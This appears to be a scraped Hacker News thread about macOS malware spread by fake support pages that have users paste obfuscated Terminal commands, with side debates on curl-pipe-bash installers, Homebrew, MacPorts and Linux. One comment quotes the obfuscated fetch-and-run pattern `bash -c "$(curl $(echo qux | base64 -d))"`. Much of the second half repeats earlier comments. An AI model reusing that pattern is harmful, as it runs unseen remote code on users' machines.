I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
Any decent project should have a way to install without Homebrew. It's really not necessary.
> and couldn't upgrade because Apple didn't support my hardware anymore
I'd classify that as an Apple problem rather than a Homebrew problem. If Apple themselves cannot be arsed to support an OS version, why would a volunteer project take on such a challenge?
For every piece of software I've fetched using Homebrew, there's a "compile from source" option available on GitHub or some other source repo.
It wouldn’t cost Homebrew folks much to add a flag to skip dependency version checking which would solve most issues with using older macOS. But they don’t want to, and have closed all issues asking for it as wontfix.
Seems like a good enough reason for them not to do it.
Their tooling is open-source, surely the few people still using unmaintained versions of macOS can create a `LegacyHomeBrew/brew` repository with patches for old macOS versions? It would also be a good place to stuff all the patches and workarounds that may be necessary to support old macOS versions.
They said they don’t want that [1]. It’s not just me, several people have asked for it. Maintaining an extra fork just for that is also out of the question for most people.
Was gonna say the same thing. There are tons of projects that support older unsupported OS versions or even different platforms. Whether that's macOS, Windows, or older versions of the Linux kernel.
>I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
How old was it? With macOS, "running an old version" is not really a viable or advisable path beyond a certain point. It might be something people want to do, and it might be a great option to have, but it's not very workable, nor supported by Apple and the general ecosystem.
>Any decent project should have a way to install without Homebrew. It's really not necessary.
We don't install homebrew because it's necessary, but because it's convenient. No way in hell I'm gonna install 50+ programs I use one by one using the projects' own installers.
Besides, if "Homebrew dropped support" is an inconvenience, "manually look for dozens of individual installers or binaries, make sure dependencies work well together, build when needed, and update all that yourself again manually" is even more of an inconvenience. Not to mention many projects on their own drop support for macOS versions all the time, or offer no binaries or installers.
Or use Homebrew on the old OS with TigerBrew (https://github.com/mistydemeo/tigerbrew), but people online suggest MacPorts, not only because it has first-party support but also because it’s apparently better designed.
I'm fine with homebrew not supporting whatever versions they choose.
I think GP's issue is forcing the use of homebrew for what seems like a rather trivial install. Just make the binary easily downloadable. It's not like you can't open the curled script to see what it fetches and do it yourself. It's just that having to jump through this useless hoop is annoying.
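A minimal sketch of that inspect-before-running workflow (a local file stands in for the real download here, since any installer URL would be a placeholder):

```shell
# Instead of `curl -fsSL https://example.com/install.sh | bash` (placeholder URL),
# save the script to disk first. A local stand-in fakes the download:
printf '#!/bin/sh\necho "installing example-tool"\n' > install.sh

# Read it, and quickly scan for risky patterns before executing anything:
grep -nE 'curl|sudo|rm -rf' install.sh || echo "no obvious red flags"

# Only run it once you're satisfied with what it does:
sh install.sh
```

Same bits downloaded, same result, but you get to see what runs before it runs.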
My mac is running the latest version of Tahoe but I never liked homebrew. You can bet I won't install it just for one app.
Homebrew really helps when you want to install more than one app... And you want to keep them updated... And you want to easily delete some of them at some point.
Managing the install lifecycle with one set of commands for multiple apps is why I love Homebrew
Apple controls these computers? I am using Linux myself; I compile from source though. To me it would seem super-strange to use an operating system where a private entity decides what it wants to do.
The people who pay for operating systems are paying for a private entity to decide what the operating system should do. They're paying for someone to compile it from source and get it to run on their computer and maintain it.
That's the whole point. Paying someone for that thing you also know how to do so they can consider that problem solved and focus on the things they know how to do.
Not sure where you're getting this from, but the latest macOS works on devices from 2019, so that's at least 6 years of support. And Homebrew fully supports macOS 14 and newer (with some support back to 10.15), which means full support for 2018 devices, and potentially even devices from 2012 will work.
More than six. 2019/2020 Intel Macs get Tahoe 26.0 + about three years of security patches for Tahoe. The last Intel Mac will be out of support in probably late 2028.
The iMac Pro is a 2017 computer, although it was sold until 2021. So given that it runs Sequoia, that's anywhere from six to ten years of OS support. OCLP will probably figure out how to patch Tahoe for the iMac Pro soon enough, but until then, you can rejoice in the fact that you don't have to run Tahoe.
It could be worse -- at least you didn't spend tens of thousands on a 2019 model Intel Mac Pro in 2023. (Yes, they still sold them, and owners of those will be SOL in 2028. That's probably the worst OS support story in recent Apple history, and it's for some of their most expensive machines)
Actually you are correct. I've been following the HN threads about Tahoe and even watched a few YouTube videos and could only facepalm.
But then again I'll get rid of the iMac Pro this year. I'll have technicians butcher it and salvage whatever they can from it -- I suspect only the SSD will survive -- and will then tell them to hollow it out and put an R1811 board inside it so I can use it as a proper standalone 5K screen. I don't care about Macs anymore, they limit me too much and I can't maintain multiple Linux machines just when I figure I would want to do something that Macs can't do (like experiment with bcachefs or ZFS pools and volumes and snapshots for my continually evolving backup setup).
Fair. The screens are really beautiful, absolutely worth reusing if possible.
I'll be decommissioning 40+ 2020 27" iMacs this year (i9-9900, 32 GB) and it's such a shame to see so many great displays and otherwise functional and plenty fast computers become, essentially, e-waste.
I agree, it is a huge shame. And the R1811 boards are more or less 300 EUR (~360 USD). Not many companies would agree to spend $360 per device on near-future e-waste just to be able to extract the high-quality display. A true shame.
But I've learned my lesson. While Apple computers served me well from 2019 to 2026, macOS gets less and less usable for me: the list of things I want to be able to do on it only grows, and its appeal only decreases (not to mention the very justified OCD I get when I look at how much crap is running 24/7 on it!).
The iPhone stays, though I wonder for how long more. But the Mac will be on its way soon enough.
Why not use MacPorts, which currently supports all the way back to Leopard, has far more packages than Homebrew, has a better design, and was created by the creator of the original FreeBSD ports system who also worked on Apple's UNIX team?
The ubiquity of Homebrew continues to confound me.
Homebrew and MacPorts unfortunately no longer fit the macOS installation layout very well. Packages installed outside the usual places create a lot of headaches during updates.
I have also preferred not to use these for the last 16+ years, and I'm not planning to start.
I wish mac users would stop using homebrew and use a real package manager with actual dependency management.
At the very least, replace homebrew with something like devbox which has `devbox global` for globally managing packages, it uses nix under the hood, and it's probably the simplest most direct replacement for homebrew.
I don't agree this is an issue and I'll tell you why: Homebrew isn't responsible for keeping the system functional like apt or pacman, it's a supplemental thing. I've also found it's useful in this capacity on Linux specifically with LTS distros, I can get the latest fzf or zoxide or whatever without having to add some shady repo.
This is how I see/use brew as well, and being able to just blow the directory away anytime and start over if need be is nice.
It's not a "system" package manager, nor was it ever meant to be. Its supplemental. I've also found it valuable on the various immutable linux distros.
I use MacPorts because of older versions of Homebrew having a weird and insecure design. [1] I think some of those design issues may have been fixed, but I’m wary of Homebrew.
It's not necessary because Mac applications shouldn't have any dependencies other than the OS. (Whatever additional libraries they use should be included.) This should also be true of basic developer tools. Once you're in a particular ecosystem, tools like deno, npm, or uv can handle their own dependencies.
Alternatively, you could do development in a container and use apt-get there. That's probably safest now that we're using coding agents.
I wish the mac users would switch to a real OS, linux, so that software companies would release linux versions of stuff first.
Codex, Claude Desktop, etc etc all starting out as "macOS exclusive" feels so silly when they're targeting programmers. Linux is the only OS a programmer can actually patch and contribute to, and yet somehow we've got a huge number of developers who don't care about having a good package manager, don't care about being able to modify their kernel, don't care about their freedom to access and edit the code of the software they rely on to work...
It's depressing how much of the software industry is just people on macbooks using homebrew to install a newer version of bash and paying $5 for "magnet" to snap windows to the corners since their OS holds them in a prison where they can't simply build themselves a tiling window manager in a weekend.
The OS is core to your tools and workflows, and using macOS cedes your right to understand, edit, and improve your OS and workflows to a company that is actively hostile to open source, and more and more hostile to users (with a significant increase in ads and overly priced paid services over the years).
Anyway, yeah, homebrew sucks. At least nix works on macOS now so there's an okay package manager there, but frankly support for macOS has been a huge drag of resources on the nix ecosystem, and I wish macOS would die off in the programming ecosystem so nix could ditch it.
I harbor similar sentiments, but I understand why OpenAI, Anthropic, Zed, etc begin with a macOS version. They're able to target a platform which is a known quantity and a good jumping off point to Linux.
I'm writing software for Linux myself and I know that you run into weird edge case windowing / graphical bugs based on environment. People are reasonably running either x11 or wayland (ecosystem is still in flux in transition) against environments like Gnome, KDE, Sway, Niri, xfce, Cinnamon, labwc, hyprland, mate, budgie, lxqt, cosmic... not to mention the different packaging ecosystem.
I don't blame companies, it seems more sane to begin with a limited scope of macOS.
The problem is that right now I have to choose the lesser of two evils. I hate what W11 has become. I only use it for games at the moment, and the only reason is that some games (Apex/BF6) do not run under Proton because of their anticheat.
And I also hate what modern Macos is heading towards. I'm still ignoring/canceling the update on both my devices for the new "glass" interface.
And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Truth be told I just want to have my mbp running Linux. But right now it's not yet where it needs to be and I am most certainly not smart enough to help build it :(
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
I'm using a decade-old thinkpad running linux and it is definitely 'doing it for me'. And I'm not exactly a light user. Power-efficient mac hardware should be weighed against convenience and price. The developer ecosystem on Linux is lightyears ahead of the apple one; I don't understand why developers still use either Windows or the Mac, because I always see them struggle with the simplest things that on Linux you don't even realize could be a problem.
Other OSs feel like you're always in some kind of jailbreak mode working around artificial restrictions. But sure, it looks snazzy, compared to my chipped battle ax.
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Are you talking about the battery? I bought a T16 AMD a month ago with the 86Wh battery and it lasts between 8 and 12 hours depending on the usage. Not as much as a macbook, but enough not to worry too much about it. New intel ones are supposed to be much better on power efficiency.
It's of course one level below the mac in that regard (and maybe others too), but if you want to use linux I think the trade-off is worth it.
It's Apple, not the users, that need to make that switch in the first instance. I'd love to use Linux again but I'm not leaving Apple hardware for it, or accepting poor software support for recent hardware.
I admit I love the mbp hardware, but I can't stand macos anymore. So when my work computer was up for replacement, I didn't think twice and went with a PC, the latest thinkpad p14s. Everything works out of the box on Linux.
Is it as nice as a mac? No, especially the plastic case doesn't feel as nice under the hands as a mac's aluminum, the touchpad is quite good but worse than a mac's, and there are some gaps around the display hinge. But the display itself is quite nice (similar resolution, oled, although not as bright as a mac's), it's silent and it's plenty fast for what I do. I didn't pay for it, so I don't directly care about this point in this situation, but it also cost around half of what an equivalent mbp would have cost.
I also haven't tried the battery life yet, but it should hold at least as well as my 5-yo hp elitebook, which still held for around 5 hours last year. I basically never use it for more than an hour unplugged, so battery life is low on my priorities.
I dunno, I'm pretty happy with my thinkpad. Even if I could run Linux flawless on a macbook (which you can't unfortunately) I'd still take the thinkpad hardware over a macbook.
A macbook air is 1.25kg, and my thinkpad is 910g, and I can really feel that difference. The thinkpad keyboard also feels ever so slightly better too... and Linux working well is worth more than pretty much anything else.
It's ok, Apple knows this and will lock its OS down into an iPhone-like OS step by step until you're boxed into a nice little prison, and you'll accept it.
Also you'll pay them 30% on every transaction you do on said computer.
I'd say support for linux has improved an incredible amount compared to 5-10 years ago. I'm often pleasantly surprised whenever a linux version of something is available because I'm used to not expecting that haha.
MacPorts has existed since 2002 and was invented by Jordan Hubbard, who created the original FreeBSD ports system and was also employed on Apple's UNIX team.
The package management story on Linux is hideously bad. The next generation replacements are all over the place (do I use snaps? Flatpak?). No one is going to learn Nix if it means you need to become a programmer just to install something.
The graphics story on Linux also sucks. I recently tried to convert my Windows gaming machine to Linux (because I hate W11 with a burning passion). It does work, but it’s incredibly painful. Wayland, fractional scaling, 120+ Hz, HDR. It’s getting better thanks to all the work Valve etc are putting in, but it’s still a janky messy patchwork.
MacOS just works. It works reliably. Installing things is easy. Playing games is easy. I’m able to customize and configure enough for my needs. I love it and I hope it sticks around because there is no way in hell I would move my work machines over to Linux full time.
What's wrong with those? I don't have a single screen which does 120 Hz + HDR, but I'm typing this on a 120 Hz laptop, with variable refresh rate, at 125% scaling, and everything works great with Plasma (haven't tried anything else). I also have an external HDR screen, but it only does 60 Hz. It works great, too, doing HDR on it but not on the laptop screen (running at the same time, of course). They also run at different scaling (125% and 100%).
Now I don't know how to confirm that VRR is actually doing anything, but I can tell there's a difference between setting the monitor to 60 and to 120 Hz. HDR on the other screen also produces a clear difference.
This is all running from integrated intel graphics, maybe with other GPUs it's more of a crapshoot, no idea.
Huh? Homebrew supports and frequently uses dependencies between formulae. It’s a bit janky around upgrades in my experience, but you’re going to have to clarify what you mean.
MacPorts was created by the creator of the original FreeBSD ports system who was also an Apple employee. It ought to be everyone's first choice for package management on macOS.
That wouldn't really help; it could be more naughty and use pastejacking so you don't even realize what's happening. That might end up catching a lot of people because, as far as I know, bash doesn't use bracketed paste by default, so you think you're copying a real command and it ends up sending your secrets before you know what happened.
Disabling JS + bracketed paste seems to be the only good solution.
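For reference, bracketed paste can be turned on for bash (and any other readline program) via `~/.inputrc`; bash 5.1+ enables it by default, but older versions ship with it off:

```
# ~/.inputrc -- pasted text is inserted literally instead of being fed
# line-by-line, so a hidden trailing newline can't auto-run a command
set enable-bracketed-paste on
```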
Btw, the OP article uses a weird setup. Why would they use `bash -c "$(curl $(echo qux | base64 -d))"` instead of just `curl | bash`?
It's not really any different than downloading a binary from a website, which we've been doing for 30 years. Ultimately, it all comes down to trusting the source.
>> Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions ...
> It's not really any different than downloading a binary from a website, which we've been doing for 30 years.
The two are very different, even though some ecosystems (such as PHP) have used the "curl | bash" idiom for about the same amount of time. Specifically, binary downloads from reputable sites have separately published hashes (MD5, SHA, etc.) to confirm what is being retrieved along with other mechanisms to certify the source of the binaries.
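That verification step is cheap in practice. A sketch with made-up file names (a local file fakes the download so the commands are runnable):

```shell
# The publisher would really provide both of these files; we fake them here:
printf 'example payload\n' > tool.tar.gz
sha256sum tool.tar.gz > tool.tar.gz.sha256   # the published checksum line
# (on macOS use `shasum -a 256` instead of `sha256sum`)

# After downloading both, verify the archive before unpacking or running it:
sha256sum -c tool.tar.gz.sha256 && echo "checksum verified"
```

Crucially, the hash has to come from a channel you already trust, not from the same page (or CDN) serving the binary.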
Which is the reason why it's better to actually cryptographically sign the packages, and put a key in some trusted keystore, where it can actually be verified to belong to the real distributor, as well as proving that the key hasn't been changed in X amount of days/months/years.
Still doesn't address the fact that keys can be stolen, people can be tricked, and the gigantic all-consuming issue of people just being too lazy to go through with verifying anything in the first place. (Which is sadly not really a thing you can blame people for, it takes up time for no easily directly discernable reason other than the vague feeling of security, and I myself have done it many more times than I would like to admit...)
Which is why package managers with well-maintained repositories are the civilized solution to software disruption. Unfortunately the Linux world has been dedicating a lot of energy to making Windows-style "download and run the exe" possible on Linux.
>Which is why package managers with well-maintained repositories are the civilized solution to software disruption.
How does that model work with distros like debian, where they freeze package versions and you might not get claude code until 2027 (or whenever the next release is)?
If the debian maintainers don't align with your preferences you can:
1. Create your own apt repository with newer software, and install from that. It's easy to package things, you can share the repository with trusted friends, running linux with friends is fun.
2. You can switch to a distro, like NixOS or Arch, which values up-to-date software more than slow stable updates.
Debian does seem to be more aligned with mailservers and such, where updates can be slow and thoughtful, not as much with personal ai development boxes where you want the hot new ai tool of the week available asap.
... Either way, learning to package software correctly for your distro of choice is a good idea, it's fun to bang out a nix expression or debian package when you need to install something that's not available yet.
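Point 1 is lighter-weight than it sounds. A flat, local apt repository is roughly this sketch (`repo/` and `mytool` are made-up names, and a repo you actually share should be GPG-signed rather than marked `trusted=yes`):

```shell
# A directory of built .deb files, served as a flat repository:
mkdir -p repo/pool
# cp mytool_1.0_amd64.deb repo/pool/       # your packages go here

# Generate the package index (needs dpkg-dev: sudo apt install dpkg-dev):
if command -v dpkg-scanpackages >/dev/null 2>&1; then
  (cd repo && dpkg-scanpackages --multiversion pool /dev/null | gzip -9 > Packages.gz)
fi

# Clients add one sources.list line and install as usual:
#   deb [trusted=yes] file:/abs/path/to/repo ./
#   sudo apt update && sudo apt install mytool
```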
I've heard this time and time again from new Linux users: "I don't want to learn the command line, I just want to be able to install and run whatever I want"
On Mac binaries need to be signed and notarized and Apple could stop the spread of the malware once it's identified or even detect it before notarizing it.
I've downloaded and installed too many packages where the developers didn't bother with this, but I uncritically went to Mac's security settings to let it do its thing anyway.
I don't know if developer utilities can be distributed through the app store, but they should be so that Apple can review them properly. Criticisms aside, the iOS App Store and the iOS security model has been the best thing for software security (especially for lay-people), ever.
Apple controlling CLI utilities is one of those supposedly good ideas that is actually bad.
They can’t stop themselves from tightening their grip ever tighter, and always want to ensure you have no functionality above what they deemed sufficient.
All the homebrew packages have checksums and are versioned in git, so if the upstream website is compromised and a malware installer is put in place of the package, `curl | bash` will just install the malware, while `brew` would start erroring out and refuse to install after downloading something with a different checksum.
You also get an audit log in the form of the git repo, and you also ensure everyone's downloading the same file, since `curl | bash` could serve different scripts to different IPs or user-agents.
I don't think brew does proper build sandboxing, so like `./configure.sh` could still download some random thing from the internet that could change, so it's only a bit better.
If you want proper sandboxing and thus even more security, consider nix.
Civilization is about cooperating with your fellow man to build great things, not bowing to the feudal lord Apple Inc.
A truly civilized person would use Linux, OpenBSD, etc, a free operating system where they may contribute fixes for their fellow man without having to beg at the boots of the single richest company on the planet with radar numbers asking for fixes from on high.
Maybe tools like https://github.com/vet-run/vet could help with these projects that would rather you use their custom install script instead of complying with distro-specific supply chains.
MacPorts, of course, features an actual .pkg installer, as well as doing pretty much everything else better, and having more packages, and existing first.
I use brew but willing to try out Macports.
How come the package install instructions seem to require sudo under MacPorts? Does that not carry more risk during the install?
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
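You don't strictly need a paid app for this; curl can report where a link ends up without rendering anything (the shortener URL below is a placeholder, and note that following redirects still sends a request to each hop):

```shell
# Follow redirects with HEAD requests only and print the final URL:
#   curl -sIL -o /dev/null -w '%{url_effective}\n' 'https://short.example/abc'

# Offline demonstration of -w '%{url_effective}' against a local file URL:
f=$(mktemp)
curl -s -o /dev/null -w '%{url_effective}\n' "file://$f"
```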
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
The GitHub links are some of the nastiest malware I have ever encountered in my life!
It steals your Apple Keychain, all your "safe" passkeys, your Google Chrome saved passwords, even your KeePass database!
Login and security are still not sufficiently attack-proofed for the most important things in life, like your bank, email, wallets, and social logins.
Your logged-in sessions also get stolen! It's unbearable that most cookies take months to expire ON THE SERVER SIDE! You have no control and can't log the attacker out!
It happened to me when I was in China and searched for ExpressVPN. The main website wouldn't load, so the GitHub link seemed like an alternative... damn. I changed my Google password 5 times and the attacker was still able to log in; it was so devastating! I had to change my email passwords multiple times too.
Sessions are what make logins valid, and they are the weakest link of all. I wish sessions used off-the-record encryption with one-time pads, such that each access requires a new key that can only be derived with a valid reply, ensuring the attacker can be logged out safely.
You have to consider your machine and all others you connected to to be compromised. Time to reinstall every device with new accounts and passwords. With unused usb sticks and images downloaded from another network you were never connected to.
Did you download anything? A bad link isn't going to do all of that, unless some nation-state actor is dropping zero-days on random people via Google search. You most likely downloaded a trojan with a Lumma stealer, and your computer is probably still compromised.
This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal.
After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
But someone who is non-technical might have run with it.
> After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
From what I understand of MoltBot, I would expect it to ask for a lot of permissions. I guess maybe they are prompted closer to configuration time in the actual app.
You're referring to [Sandboxing] Mandatory Access Controls [0]. Windows doesn't implement MAC in the same way, instead using Mandatory Integrity Controls [1].
Windows can implement these things as much as they like, but if you paste a command into CMD.exe, it can access your files with no popup like MacOS gives you.
In Windows, access to files is controlled by ACLs when NTFS is used (dating back to NT 3.1 with NTFS). So it depends on which user runs a process.
Basic hygiene is very simple: never run as Administrator. Create and use a regular user or a power-user group account. It's similar to regular linux practice. Use the Administrator account only when needed.
GP is talking about isolation inside the current user. Recent macOS versions ask before allowing a program to access files inside Documents, Desktop, etc. Whether that helps or not is debatable, but it’s not quite the same as what Windows ACLs do out of the box. To achieve the same on Windows, one would have to run the program as a different user to which they’d selectively grant access to the folders inside their profile.
It's not enabled by default, though. Enabling it by default would probably break just about every Windows program out there and like UAC on Vista, everyone would turn it off immediately.
I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the url.
A day later my parents called me, very stressed out about a popup on my mother's iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website styled to look like a modal on top of an iOS Settings app page. With the new UI this was extremely effective, as the page title is just a tiny thing down at the bottom in the scrolled state.
I don’t know what is going on, but I’d assume the problem is AI moderation.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspects every call to exec and fork as they occur in the kernel and checks them for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they run. It will stop keychain attacks and infostealing (as these tools also see every file system op as it happens in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
Antivirus programs will scan PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
It seems most anti-malware is the equivalent of the TSA - security theatre that wastes your time and attention, catching plenty of water bottles but not the real stuff.
If someone prepares a legit-looking web page instructing people to download and run malware, we'd better learn more about security and caution before blindly following those directions.
Why should it be Google's (or Bing's) duty to filter those out?
Why should Google be responsible for content they accept money to promote on their website, and then elect to disguise as "natural" search results specifically in order to trick you into clicking them without realizing they're ads?
> Why should it be Google's (or Bing's) duty to filter those out?
Google intentionally disguises ads as search results, and even lets advertisers present a fake URL. When the system's purpose is to profit from tricking inattentive users, I think they should take on some liability for the outcome of what they're tricking people into doing.
Not to say that better teaching security isn't also a good idea.
It may not be their duty to filter it out, but it should definitely be their duty to not take money to bump it to the top of their results. Let the algorithm dump random unlinked medium posts on the 5th page where they belong
Actually… I think this can be solved by AI answers. I don’t look up commands on random websites; instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLM.
What we used to have, 15 years ago, was a really well-functioning Google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate at figuring out what you were actually searching for. Modern Google is just not there, even with AI answers, which are supposed to be infinitely better at natural language processing.
I think that played a somewhat smaller role than Google seemingly gradually starting to take its position for granted and so everything became more focused on revenue generation and less focused on providing the highest quality experiences or results.
Beyond result quality it's absurd that it took LLMs to get meaningful natural language search. Google could have been working on that for many years, even if in a comparably simple manner, but seemingly never even bothered to try, even though that was always obviously going to be the next big step in search.
We used to have an endless supply of new search engines, so "SEO" was not viable. Then Google got a monopoly on search, DoubleClick reverse-acquired Google, and here we are.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
LLMs will allow malicious actors to sneak backdoors into the dataset. Most of the popular LLMs use some kind of blacklisting instead of a smaller, specific/specialised dataset. The latter seems more akin to whitelisting.
Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
I said it was likely an easy solution. Glad to see my intuition was correct!
I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
> No worries at all if you’re not familiar with that expression.
I'm not contesting that it was the final straw, I'm contesting it was a straw at all. "I want to change a setting but am too lazy to open the settings" is not an argument against Macs, it's a piece of evidence that you don't know how to operate a computer.
> I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
This sort of patronizing assholery is childish and unbecoming. Your comment would've been better without it.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc. purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
> browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files"
If you want to trash your system I believe nothing prevents you from giving Firefox full-disk access.
A solution would be to stop shipping Macs with the Terminal app. Computers are now used by a wide variety of people, some without technical knowledge; maybe a default switch on macOS that displays warnings on rather trivial attacks like this would help.
Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions (e.g. the new "native" Claude Code install)...
Publish through homebrew like a civilized person, please!
I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
Any decent project should have a way to install without Homebrew. It's really not necessary.
> and couldn't upgrade because Apple didn't support my hardware anymore
I'd classify that as an Apple problem rather than a Homebrew problem. If Apple themselves cannot be arsed to support an OS version, why would a volunteer project take on such a challenge?
For every piece of software I've fetched using Homebrew, there's a "compile from source" option available on Github or some other source repo.
And if there isn’t that option explicitly highlighted, one can always look at the formula in homebrew for the instructions.
It wouldn’t cost Homebrew folks much to add a flag to skip dependency version checking which would solve most issues with using older macOS. But they don’t want to, and have closed all issues asking for it as wontfix.
> But they don’t want to
Seems like good enough a reason for them not to do it.
Their tooling is open-source, surely the few people still using unmaintained versions of macOS can create a `LegacyHomeBrew/brew` repository with patches for old macOS versions? It would also be a good place to stuff all the patches and workarounds that may be necessary to support old macOS versions.
Is this something you could add as a hot fix yourself and submit a PR for?
They said they don’t want that [1]. It’s not just me, several people have asked for it. Maintaining an extra fork just for that is also out of the question for most people.
[1] https://github.com/Homebrew/brew/issues/14217
Most volunteer projects do this.
Was gonna say the same thing. There are tons of projects that support older unsupported OS versions or even different platforms. Whether that's macOS, Windows, or older versions of the Linux kernel.
>I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
How old was it? With macOS, "running an old version" is not really a viable or advisable path beyond a certain point. It might be something people want to do, and it might be a great option to have, but it's not very workable, nor supported by Apple and the general ecosystem.
>Any decent project should have a way to install without Homebrew. It's really not necessary.
We don't install homebrew because it's necessary, but because it's convenient. No way in hell I'm gonna install 50+ programs I use one by one using the projects' own installers.
Besides, if "Homebrew dropped support" is an inconvenience, "manually look for dozens of individual installers or binaries, make sure dependencies work well together, build when needed, and update all that yourself again manually" is even more of an inconvenience. Not to mention many projects drop support for macOS versions on their own all the time, or offer no binaries or installers.
Consider using MacPorts then, which only recently dropped support for Tiger and supports Leopard.
> and couldn't upgrade because Apple didn't support my hardware anymore.
If you really want, you may be able to upgrade the OS anyways with https://github.com/dortania/OpenCore-Legacy-Patcher.
Or use Homebrew on the old OS with TigerBrew (https://github.com/mistydemeo/tigerbrew), but people online suggest MacPorts, not only because it has first-party support but also because it’s apparently better designed.
Seems reasonable to not support an OS apple doesn’t support anymore
I'm fine with homebrew not supporting whatever versions they choose.
I think GP's issue is forcing the use of homebrew for what seems like a rather trivial install. Just make the binary easily downloadable. It's not like you can't open the curled script to see what it fetches and do it yourself. It's just that having to jump through this useless hoop is annoying.
My mac is running the latest version of Tahoe but I never liked homebrew. You can bet I won't install it just for one app.
Homebrew really helps when you want to install more than one app... And you want to keep them updated... And you want to easily delete some of them at some point.
Managing the install lifecycle with one set of commands for multiple apps is why I love Homebrew
Apple controls these computers? I am using Linux myself; I compile from source though. To me it would seem super-strange to use an operating system where a private entity decides what it wants to do.
The people who pay for operating systems are paying for a private entity to decide what the operating system should do. They're paying for someone to compile it from source and get it to run on their computer and maintain it.
That's the whole point. Paying someone for that thing you also know how to do so they can consider that problem solved and focus on the things they know how to do.
> get it to run on their computer and maintain it... forever and ever and ever.
Oh wait, that last part doesn't exist.
Gentoo?
Apple only supports for 3 years
Not sure where you're getting this from, but the latest macOS works on devices from 2019, so it's at least 6 years of support. And Homebrew fully supports macOS 14 and newer (with partial support back to 10.15), which means full support for 2018 devices, and potentially even devices from 2012 will work.
Sources:
https://eshop.macsales.com/guides/Mac_OS_X_Compatibility
https://docs.brew.sh/Installation#2
Well, Tahoe doesn't work on 2019 iMacs, and that chart shows the early 2020 Macbook Air isn't eligible either, so support duration varies a bit.
Which device was only supported for three years? Even the final Intel Macs are getting six.
